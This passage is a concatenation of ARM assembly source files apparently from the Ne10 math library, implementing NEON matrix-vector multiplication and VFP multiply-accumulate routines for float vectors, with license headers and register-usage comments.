pop {r4, r5, r6, r7}
bx lr
|
open-vela/external_Ne10 | 16,927 | modules/math/NE10_mulcmatvec.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_mulcmatvec.neon.s
@
.text
.syntax unified
.include "NE10header.s"
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro multiplies a single 2x2 matrix by four vec2's.
@ The caller (ne10_mulcmatvec_cm2x2f_v2f_neon) loads the vectors
@ de-interleaved:
@
@   q8 = (x1, x2, x3, x4)    q9 = (y1, y2, y3, y4)
@
@ and the 2x2 matrix in d0[0]=a (m11), d1[0]=b (m21),
@ d2[0]=c (m12), d3[0]=d (m22) — column-major memory order.
@
@ Results:  q12 = result x components, q13 = result y components.
@ Clobbers: q8, q9 (inputs overwritten), q10, q11 (scratch).
@
@ NOTE(review): the old header described eight vectors in q8-q11;
@ the code below only consumes q8/q9 (four vec2's).
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro MUL_MAT2x2_VEC2
vmul.f32 q10, q8 , d0[0] @ a*x1,x2,x3,x4
vmul.f32 q8 , q8 , d1[0] @ b*x1,x2,x3,x4
vmul.f32 q11, q9 , d2[0] @ c*y1,y2,y3,y4
vmul.f32 q9 , q9 , d3[0] @ d*y1,y2,y3,y4
vadd.f32 q12, q10, q11 @ res.x = a*(x1..x4) + c*(y1..y4)
vadd.f32 q13, q8, q9 @ res.y = b*(x1..x4) + d*(y1..y4)
.endm
.balign 4
.global ne10_mulcmatvec_cm2x2f_v2f_neon
.thumb
.thumb_func
ne10_mulcmatvec_cm2x2f_v2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Multiplies an array of vec2's by a single constant 2x2 matrix:
@ dst[i] = (*cst) * src[i].
@
@ arm_result_t ne10_mulcmatvec_cm2x2f_v2f ( arm_vec2f_t * dst,
@ const arm_mat2x2f_t * cst,
@ arm_vec2f_t * src,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ (this register is updated and moved to the next entry
@ after every store operation)
@ r1: *cst, memory pointer to where the constant matrix is kept
@ r2: *src & current src entry's address
@ r3: int count & the number of items in the input array
@
@ r4: the number of items that are left to be processed at the
@ end of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r4; This is what's left to be processed after this loop
@ First we load the constant 2x2 matrix, then each time we load
@ four vectors of 2-floats, multiply each vector with the matrix,
@ finally store the resulting vectors in the destination memory
@ address, and move on to the next four vectors.
@ load the constant matrix
@ d0 = m11(a) d2 = m12(c)
@ d1 = m21(b) d3 = m22(d)
vld4.32 { d0[0], d1[0], d2[0], d3[0] }, [r1]
cmp r3, #0
beq .L_check_mat2x2
@ load the 1st set of values
@ if {V1, V2, V3, V4} are 4 vec2's in memory
@ then after the load operations the 4 vectors
@ are stored in registers q8-q9 like so:
@
@ q8=(x1,x2,x3,x4)
@ q9=(y1,y2,y3,y4)
vld2.32 { d16, d17, d18, d19 }, [r2]!
subs r3, r3, #4 @ 4 vectors (8 floats) for this set
@ calculate values for the 1st set
MUL_MAT2x2_VEC2
ble .L_mainloopend_mat2x2
.L_mainloop_mat2x2:
@ store the result for the current set
vst2.32 { d24, d25, d26, d27 }, [r0]!
@ load the next set of values
vld2.32 { d16, d17, d18, d19 }, [r2]!
subs r3, r3, #4
@ calculate values for the next set
MUL_MAT2x2_VEC2
bgt .L_mainloop_mat2x2 @ loop if r3 > 0, if we have at least another 4 vectors (8 floats) to process
.L_mainloopend_mat2x2:
@ the last iteration for this call
@ store the result for the last set
vst2.32 { d24, d25, d26, d27 }, [r0]!
.L_check_mat2x2:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_mat2x2
.L_secondloop_mat2x2:
@ process the last few items one vec2 at a time; only lane 0 of the
@ loaded/stored registers is meaningful (the macro's other lanes
@ compute on stale data that is never stored)
vld2.32 { d16[0], d18[0] }, [r2]!
subs r4, r4, #1
@ calculate values
MUL_MAT2x2_VEC2
@ store the results
vst2.32 { d24[0], d26[0] }, [r0]!
bgt .L_secondloop_mat2x2
.L_return_mat2x2:
@ return NE10_OK (0)
pop {r4}
mov r0, #0
bx lr
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ A macro to load four vec3's from [r2] (post-incremented) into
@ registers q8-q10, de-interleaved: q8 = x's, q9 = y's, q10 = z's.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro LOAD_FOUR_VEC3
vld3.32 { d16, d18, d20 }, [r2]!
vld3.32 { d17, d19, d21 }, [r2]!
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro multiplies the constant 3x3 matrix loaded into
@ registers d0-d5 by four vec3's that the above macro LOAD_FOUR_VEC3
@ loads. The results are returned in registers q11, q12, and q13
@ (q11 = result x's, q12 = result y's, q13 = result z's).
@ The matrix lanes d0[0],d0[1],d1[0] etc. hold one matrix row each,
@ as arranged by the vld3 loads in ne10_mulcmatvec_cm3x3f_v3f_neon.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro MUL_MAT3x3_VEC3
vmul.f32 q11, q8 , d0[0] @ row1 . (x,y,z) accumulated over 3 steps
vmla.f32 q11, q9 , d0[1]
vmla.f32 q11, q10, d1[0]
vmul.f32 q12, q8 , d2[0] @ row2 . (x,y,z)
vmla.f32 q12, q9 , d2[1]
vmla.f32 q12, q10, d3[0]
vmul.f32 q13, q8 , d4[0] @ row3 . (x,y,z)
vmla.f32 q13, q9 , d4[1]
vmla.f32 q13, q10, d5[0]
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ A macro to store the four resulting vec3's that were returned in
@ registers q11 to q13 by the above macro MUL_MAT3x3_VEC3, writing
@ them re-interleaved to [r0] (post-incremented).
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro STORE_FOUR_VEC3
vst3.32 { d22, d24, d26 }, [r0]!
vst3.32 { d23, d25, d27 }, [r0]!
.endm
.align 2
.global ne10_mulcmatvec_cm3x3f_v3f_neon
.thumb
.thumb_func
ne10_mulcmatvec_cm3x3f_v3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Multiplies an array of vec3's by a single constant 3x3 matrix:
@ dst[i] = (*cst) * src[i].
@
@ arm_result_t ne10_mulcmatvec_cm3x3f_v3f ( arm_vec3f_t * dst,
@ const arm_mat3x3f_t * cst,
@ arm_vec3f_t * src,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ (this register is updated and moved to the next entry
@ after every store operation)
@ r1: *cst, memory pointer to where the constant matrix is kept
@ r2: *src & current src entry's address
@ r3: int count & the number of items in the input array
@
@ r4: the number of items that are left to be processed at the
@ end of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push { r4 }
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r4; This is what's left to be processed after this loop
@ First we load the constant 3x3 matrix, then each time we load
@ four vectors of 3-floats, multiply each vector with the matrix,
@ finally store the resulting vectors in the destination memory
@ address, and move on to the next four vectors.
@ load the constant matrix into q0-q2 (vld3 de-interleaves, so each
@ d-register pair ends up holding one matrix row across its lanes)
vld3.32 { d0 , d2 , d4 }, [r1]!
vld3.32 { d1[0], d3[0], d5[0] }, [r1]
cmp r3, #0
beq .L_check_mat3x3
@ load the 1st set of values
LOAD_FOUR_VEC3
subs r3, r3, #4 @ 4 vectors for this set
@ calculate values for the 1st set
MUL_MAT3x3_VEC3
ble .L_mainloopend_mat3x3
.L_mainloop_mat3x3:
@ store the result for the current set
STORE_FOUR_VEC3
@ load the next set of values
LOAD_FOUR_VEC3
subs r3, r3, #4
@ calculate values for the next set
MUL_MAT3x3_VEC3
bgt .L_mainloop_mat3x3 @ loop if r3 > 0, if we have at least another 4 vectors (12 floats) to process
.L_mainloopend_mat3x3:
@ the last iteration for this call
@ store the result for the last set
STORE_FOUR_VEC3
.L_check_mat3x3:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_mat3x3
.L_secondloop_mat3x3:
@ process the last few items one vec3 at a time; only lane 0 of the
@ loaded/stored registers is meaningful
vld3.32 { d16[0], d18[0], d20[0] }, [r2]!
subs r4, r4, #1
MUL_MAT3x3_VEC3
vst3.32 { d22[0], d24[0], d26[0] }, [r0]!
bgt .L_secondloop_mat3x3
.L_return_mat3x3:
@ return NE10_OK (0)
pop { r4 }
mov r0, #0
bx lr
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ A macro to load four vec4's into registers q8-q11.
@ This macro uses r2 (the third parameter in
@ ne10_mulcmatvec_cm4x4f_v4f_neon) as the address register, and
@ advances it past the 16 floats it consumes.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro LOAD_FOUR_VEC4
vld4.32 { d16, d18, d20, d22 }, [r2]! @ de-interleaving load: lanes 0-1 of q8-q11
vld4.32 { d17, d19, d21, d23 }, [r2]! @ lanes 2-3; q8..q11 hold the x,y,z,w components respectively
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro multiplies the constant 4x4 matrix that is loaded
@ in ne10_mulcmatvec_cm4x4f_v4f_neon by four vec4's that are loaded in
@ the above macro LOAD_FOUR_VEC4.
@ The resulting four vectors are returned in registers q12 to q15.
@ Each result component is a sum of four scalar-by-vector products;
@ the matrix scalars live in the q0-q3 lanes produced by the vld4
@ de-interleave in the caller.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro MUL_MAT4x4_VEC4
vmul.f32 q12, q8 , d0[0] @ q12 = result 'x' components: start with x*m(0,0)
vmla.f32 q12, q9 , d0[1] @ accumulate y, z, w contributions
vmla.f32 q12, q10, d1[0]
vmla.f32 q12, q11, d1[1]
vmul.f32 q13, q8 , d2[0] @ q13 = result 'y' components
vmla.f32 q13, q9 , d2[1]
vmla.f32 q13, q10, d3[0]
vmla.f32 q13, q11, d3[1]
vmul.f32 q14, q8 , d4[0] @ q14 = result 'z' components
vmla.f32 q14, q9 , d4[1]
vmla.f32 q14, q10, d5[0]
vmla.f32 q14, q11, d5[1]
vmul.f32 q15, q8 , d6[0] @ q15 = result 'w' components
vmla.f32 q15, q9 , d6[1]
vmla.f32 q15, q10, d7[0]
vmla.f32 q15, q11, d7[1]
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro stores the results from the above macro MUL_MAT4x4_VEC4
@ from registers q12-q15 in to the destination memory (r0) which is
@ the first parameter of ne10_mulcmatvec_cm4x4f_v4f_neon().
@ r0 is advanced past the 16 floats written.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro STORE_FOUR_VEC4
vst4.32 { d24, d26, d28, d30 }, [r0]! @ re-interleaving store: vectors 0-1
vst4.32 { d25, d27, d29, d31 }, [r0]! @ vectors 2-3
.endm
.align 2
.global ne10_mulcmatvec_cm4x4f_v4f_neon
.thumb
.thumb_func
ne10_mulcmatvec_cm4x4f_v4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mulcmatvec_cm4x4f_v4f ( arm_vec4f_t * dst,
@ const arm_mat4x4f_t * cst,
@ arm_vec4f_t * src,
@ unsigned int count)
@
@ dst[i] = cst * src[i] for i in [0, count)
@
@ r0: *dst & current dst entry's address
@ (this register is updated and moved to the next entry
@ after every store operation)
@ r1: *cst, pointer to memory where the constant matrix is kept
@ r2: *src & current src entry's address
@ r3: int count & the number of items in the input array
@
@ r4: the number of items that are left to be processed at the
@ end of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r4; This is what's left to be processed after this loop
@ First we load the constant 4x4 matrix, then each time we load
@ four vectors of 4-floats, multiply each vector with the matrix,
@ finally store the resulting vectors in the destination memory
@ address, and move on to the next four vectors.
@ load the constant matrix into q0-q3
vld4.32 { d0, d2, d4, d6 }, [r1]!
vld4.32 { d1, d3, d5, d7 }, [r1]
cmp r3, #0
beq .L_check_mat4x4 @ fewer than 4 items in total; skip the unrolled loop
@ load the 1st set of values
LOAD_FOUR_VEC4
subs r3, r3, #4
@ calculate values for the 1st set
MUL_MAT4x4_VEC4
ble .L_mainloopend_mat4x4
.L_mainloop_mat4x4:
@ store the result for the current set
STORE_FOUR_VEC4
@ load the next set of values
LOAD_FOUR_VEC4
subs r3, r3, #4
@ calculate values for the next set
MUL_MAT4x4_VEC4
bgt .L_mainloop_mat4x4 @ loop while r3 > 0, i.e. while at least another 4 vectors (16 floats) remain
.L_mainloopend_mat4x4:
@ the last iteration for this call
@ store the result for the last set
STORE_FOUR_VEC4
.L_check_mat4x4:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_mat4x4
.L_secondloop_mat4x4:
@ process the last few items left in the input array, one vec4 at a time
vld4.32 { d16[0], d18[0], d20[0], d22[0] }, [r2]!
subs r4, r4, #1
@ calculate values
MUL_MAT4x4_VEC4
@ store the results
vst4.32 { d24[0], d26[0], d28[0], d30[0] }, [r0]!
bgt .L_secondloop_mat4x4
.L_return_mat4x4:
@ return NE10_OK (0) in r0
pop {r4}
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 11,477 | modules/math/NE10_mlac.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_mlac.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_mlac_float_asm
.thumb
.thumb_func
ne10_mlac_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mlac_float(arm_float_t * dst, arm_float_t * acc,
@ arm_float_t * src, const arm_float_t cst,
@ unsigned int count)
@
@ dst[i] = acc[i] + (src[i] * cst) for i in [0, count)
@
@ r0: *dst
@ r1: *acc
@ r2: *src
@ r3: cst (the float's bit pattern, passed in a core register)
@
@ r4: loop counter (count, read from the stack)
@ r5: current item's offset in acc[], src[], and dst[]
@ r6: current accumulator item's address made of base(r1)+offset(r5)
@ r7: current source item's address made of base(r2)+offset(r5)
@ r8: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7, r8}
ldr r4, [r13, #20] @ r4 = count (5th argument: on the stack, above the 5 pushed registers)
cbz r4, .LoopEndFloat
vmov s3, r3 @ cst is loop-invariant: move it into s3 once, before the loop
mov r5, #0
.LoopBeginFloat:
add r6, r1, r5 @ Get current accumulator item's address in memory
vldr s10, [r6, #0] @ Load acc[i]
add r7, r2, r5 @ Get current source item's address in memory
vldr s2, [r7, #0] @ Load src[i]
vmla.f32 s10, s2, s3 @ s10 = acc[i] + ( src[i] * cst )
add r8, r0, r5 @ Get current destination item's address in memory
vstr s10, [r8, #0] @ Store the result back into the main memory
add r5, r5, #4 @ increase the offset by 1*sizeof(float)
subs r4, r4, #1 @ count down using the current index (i--)
bne .LoopBeginFloat @ Continue if "i < count"
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7, r8}
bx lr
.balign 4
.global ne10_mlac_vec2f_asm
.thumb
.thumb_func
ne10_mlac_vec2f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mlac_vec2f(arm_vec2f_t * dst, arm_vec2f_t * acc,
@ arm_vec2f_t * src, const arm_vec2f_t * cst,
@ unsigned int count)
@
@ dst[i] = acc[i] + (src[i] * *cst), component-wise, for i in [0, count)
@
@ r0: *dst
@ r1: *acc
@ r2: *src
@ r3: *cst
@
@ r4: loop counter (count, read from the stack)
@ r5: current item's offset in acc[], src[], and dst[]
@ r6: current accumulator item's address made of base(r1)+offset(r5)
@ r7: current source item's address made of base(r2)+offset(r5)
@ r8: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7, r8}
ldr r4, [r13, #20] @ r4 = count (5th argument: on the stack, above the 5 pushed registers)
cbz r4, .LoopEndVec2F
mov r5, #0
.LoopBeginVec2F:
add r6, r1, r5 @ Get current accumulator item's address in memory
vldr s10, [r6, #0] @ Load acc[i].x and acc[i].y
vldr s11, [r6, #4]
add r7, r2, r5 @ Get current source item's address in memory
vldr s1, [r7, #0] @ Load src[i].x and src[i].y
vldr s2, [r7, #4]
vldr s3, [r3, #0] @ Load cst->x and cst->y
vldr s4, [r3, #4]
vmla.f32 s10, s1, s3 @ s10 = acc[i].x + ( src[i].x * cst->x )
vmla.f32 s11, s2, s4 @ same for 'y'
add r8, r0, r5 @ Get current destination item's address in memory
vstr s10, [r8, #0] @ Store the results back into the main memory
vstr s11, [r8, #4]
add r5, r5, #8 @ increase the offset by 2*sizeof(float) @@ (for x and y)
subs r4, r4, #1 @ count down using the current index (i--)
bne .LoopBeginVec2F @ Continue if "i < count"
.LoopEndVec2F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7, r8}
bx lr
.balign 4
.global ne10_mlac_vec3f_asm
.thumb
.thumb_func
ne10_mlac_vec3f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mlac_vec3f(arm_vec3f_t * dst, arm_vec3f_t * acc,
@ arm_vec3f_t * src, const arm_vec3f_t * cst,
@ unsigned int count)
@
@ dst[i] = acc[i] + (src[i] * *cst), component-wise, for i in [0, count)
@
@ r0: *dst
@ r1: *acc
@ r2: *src
@ r3: *cst
@
@ r4: loop counter (count, read from the stack)
@ r5: current item's offset in acc[], src[], and dst[]
@ r6: current accumulator item's address made of base(r1)+offset(r5)
@ r7: current source item's address made of base(r2)+offset(r5)
@ r8: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7, r8}
ldr r4, [r13, #20] @ r4 = count (5th argument: on the stack, above the 5 pushed registers)
cbz r4, .LoopEndVec3F
mov r5, #0
.LoopBeginVec3F:
add r6, r1, r5 @ Get current accumulator item's address in memory
vldr s10, [r6, #0] @ Load acc[i].x, acc[i].y , and acc[i].z
vldr s11, [r6, #4]
vldr s12, [r6, #8]
add r7, r2, r5 @ Get current source item's address in memory
vldr s1, [r7, #0] @ Load src[i].x, src[i].y , and src[i].z
vldr s2, [r7, #4]
vldr s3, [r7, #8]
vldr s4, [r3, #0] @ Load cst->x, cst->y, and cst->z
vldr s5, [r3, #4]
vldr s6, [r3, #8]
vmla.f32 s10, s1, s4 @ s10 = acc[i].x + ( src[i].x * cst->x )
vmla.f32 s11, s2, s5 @ same for 'y'
vmla.f32 s12, s3, s6 @ same for 'z'
add r8, r0, r5 @ Get current destination item's address in memory
vstr s10, [r8, #0] @ Store the results back into the main memory
vstr s11, [r8, #4]
vstr s12, [r8, #8]
add r5, r5, #12 @ increase the offset by 3*sizeof(float) @@ (for x, y, and z)
subs r4, r4, #1 @ count down using the current index (i--)
bne .LoopBeginVec3F @ Continue if "i < count"
.LoopEndVec3F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7, r8}
bx lr
.balign 4
.global ne10_mlac_vec4f_asm
.thumb
.thumb_func
ne10_mlac_vec4f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mlac_vec4f(arm_vec4f_t * dst, arm_vec4f_t * acc,
@ arm_vec4f_t * src, const arm_vec4f_t * cst,
@ unsigned int count)
@
@ dst[i] = acc[i] + (src[i] * *cst), component-wise, for i in [0, count)
@
@ r0: *dst
@ r1: *acc
@ r2: *src
@ r3: *cst
@
@ r4: loop counter (count, read from the stack)
@ r5: current item's offset in acc[], src[], and dst[]
@ r6: current accumulator item's address made of base(r1)+offset(r5)
@ r7: current source item's address made of base(r2)+offset(r5)
@ r8: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7, r8}
ldr r4, [r13, #20] @ r4 = count (5th argument: on the stack, above the 5 pushed registers)
cbz r4, .LoopEndVec4F
mov r5, #0
.LoopBeginVec4F:
add r6, r1, r5 @ Get current accumulator item's address in memory
vldr s10, [r6, #0] @ Load acc[i].x, acc[i].y , acc[i].z, and w
vldr s11, [r6, #4]
vldr s12, [r6, #8]
vldr s13, [r6, #12]
add r7, r2, r5 @ Get current source item's address in memory
vldr s1, [r7, #0] @ Load src[i].x, src[i].y , src[i].z, and w
vldr s2, [r7, #4]
vldr s3, [r7, #8]
vldr s4, [r7, #12]
vldr s5, [r3, #0] @ Load cst->x, cst->y, cst->z, and w
vldr s6, [r3, #4]
vldr s7, [r3, #8]
vldr s8, [r3, #12]
vmla.f32 s10, s1, s5 @ s10 = acc[i].x + ( src[i].x * cst->x )
vmla.f32 s11, s2, s6 @ same for 'y'
vmla.f32 s12, s3, s7 @ same for 'z'
vmla.f32 s13, s4, s8 @ same for 'w'
add r8, r0, r5 @ Get current destination item's address in memory
vstr s10, [r8, #0] @ Store the results back into the main memory
vstr s11, [r8, #4]
vstr s12, [r8, #8]
vstr s13, [r8, #12]
add r5, r5, #16 @ increase the offset by 4*sizeof(float) @@ (for x, y, z, and w)
subs r4, r4, #1 @ count down using the current index (i--)
bne .LoopBeginVec4F @ Continue if "i < count"
.LoopEndVec4F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7, r8}
bx lr
|
open-vela/external_Ne10 | 3,591 | modules/math/NE10_mla.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_mla.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_mla_float_asm
.thumb
.thumb_func
ne10_mla_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mla_float(arm_float_t * dst, arm_float_t * acc,
@ arm_float_t * src1, const arm_float_t * src2,
@ unsigned int count)
@
@ dst[i] = acc[i] + (src1[i] * src2[i]) for i in [0, count)
@
@ r0: *dst & current dst entry's address (advanced after every store)
@ r1: *acc & current acc entry's address (advanced every iteration)
@ r2: *src1 & current src1 entry's address (advanced every iteration)
@ r3: *src2 & current src2 entry's address (advanced every iteration)
@
@ r4: loop counter (count, read from the stack)
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
ldr r4, [r13, #4] @ r4 = count (5th argument: on the stack, above the pushed r4)
cbz r4, .LoopEndFloat
.LoopBeginFloat:
vldr s10, [r1] @ Load s10 = acc[i]
vldr s1, [r2] @ Load s1 = src1[i]
vldr s2, [r3] @ Load s2 = src2[i]
add r1, r1, #4 @ move to the next acc entry
add r2, r2, #4 @ move to the next src1 entry
add r3, r3, #4 @ next entry in src2
vmla.f32 s10, s1, s2 @ s10 = acc[i] + (src1[i] * src2[i])
